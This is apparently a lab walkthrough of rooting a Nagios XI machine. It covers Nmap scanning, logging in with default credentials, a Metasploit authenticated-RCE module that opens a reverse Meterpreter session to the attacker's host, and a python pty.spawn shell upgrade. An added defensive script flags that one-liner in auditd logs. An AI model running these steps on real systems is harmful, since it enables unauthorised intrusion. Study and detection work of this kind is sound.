Let’s discover the IP address of the machine. To find the target’s IP address, we use an Nmap ping scan.
nmap -sn 192.168.43.1/24
We found the target’s IP address, 192.168.43.152. Our next step is to scan the target machine for open ports using Nmap.
sudo nmap -A 192.168.43.152
We performed an Nmap scan with OS detection and version detection, and we see that many ports are open on the target machine.
For more details, we need to start enumerating the target machine, so we open a web browser to explore the HTTP service. The landing page does not give any useful information, but the Nmap scan showed http-title: Nagios XI.
Let’s explore the /nagiosxi login page. Here we try some common passwords like admin-admin, admin-password and admin-root, but we cannot log in. We then try again with the default username nagiosadmin, and this time we log in to the Nagios XI panel.
We search for Nagios XI exploits and find an authenticated RCE exploit. Let’s start msfconsole and load the nagios_xi_authenticated_rce exploit.
sudo msfconsole
use exploit/linux/http/nagios_xi_authenticated_rce
set rhosts 192.168.43.152
set lhost 192.168.43.103
set password admin
run
After running the exploit, we get a Meterpreter session on the target machine. Let’s run the shell command to get a bash shell environment.
shell
python -c 'import pty;pty.spawn("/bin/bash")'
cd /root
Now we have a proper root shell. Let’s move to the /root directory and read our final root flag.
ls
cat proof.txt
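From the defender's side, the python -c pty.spawn step above is visible in process-execution logs. The following is an added example, not part of the original walkthrough: it parses auditd EXECVE records and flags that pattern. The sample records are constructed, and the helper names (decode_args, is_pty_upgrade, flag_records) are hypothetical.

```python
import re

# Constructed sample: the one-liner from the walkthrough, hex-encoded the way
# auditd logs any argv element that contains spaces or double quotes.
_ONE_LINER = 'import pty;pty.spawn("/bin/bash")'
SAMPLE_RECORDS = [  # constructed EXECVE records, not captured from a real host
    'type=EXECVE msg=audit(1700000000.101:901): argc=2 a0="ls" a1="-la"',
    'type=EXECVE msg=audit(1700000000.202:902): argc=3 a0="python" a1="-c" a2='
    + _ONE_LINER.encode().hex().upper(),
    'type=EXECVE msg=audit(1700000000.303:903): argc=3 a0="python" a1="-c" a2="print(1)"',
    'type=EXECVE msg=audit(1700000000.404:904): argc=2 a0="python3" a1="/usr/local/bin/check.py"',
]

ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')
EVENT_RE = re.compile(r'msg=audit\([\d.]+:(\d+)\)')
PYTHON_RE = re.compile(r'^(?:.*/)?python[\d.]*$')
PTY_SPAWN_RE = re.compile(r'\bpty\s*\.\s*spawn\s*\(')

def decode_args(record):
    """Return argv from an EXECVE record, decoding hex-encoded arguments."""
    args = {}
    for m in ARG_RE.finditer(record):
        idx, quoted, hexed = int(m.group(1)), m.group(2), m.group(3)
        if quoted is not None:
            args[idx] = quoted
        elif len(hexed) % 2 == 0:
            args[idx] = bytes.fromhex(hexed).decode("utf-8", "replace")
        else:
            args[idx] = hexed  # odd length, so not a hex-encoded argument; keep raw
    return [args[i] for i in sorted(args)]

def is_pty_upgrade(record):
    """True when a Python interpreter is run with -c code that calls pty.spawn()."""
    if not record.startswith("type=EXECVE"):
        return False
    argv = decode_args(record)
    if len(argv) < 3 or not PYTHON_RE.match(argv[0]) or "-c" not in argv[1:]:
        return False
    return any(PTY_SPAWN_RE.search(a) for a in argv[1:])

def flag_records(records):
    """Return the audit event ids of records matching the pty-upgrade pattern."""
    hits = []
    for rec in records:
        m = EVENT_RE.search(rec)
        if m and is_pty_upgrade(rec):
            hits.append(m.group(1))
    return hits

if __name__ == "__main__":
    print(flag_records(SAMPLE_RECORDS))
```

Because the argument is hex-encoded in the raw record, a plain text search for pty.spawn over the audit log does not match; the arguments have to be decoded first.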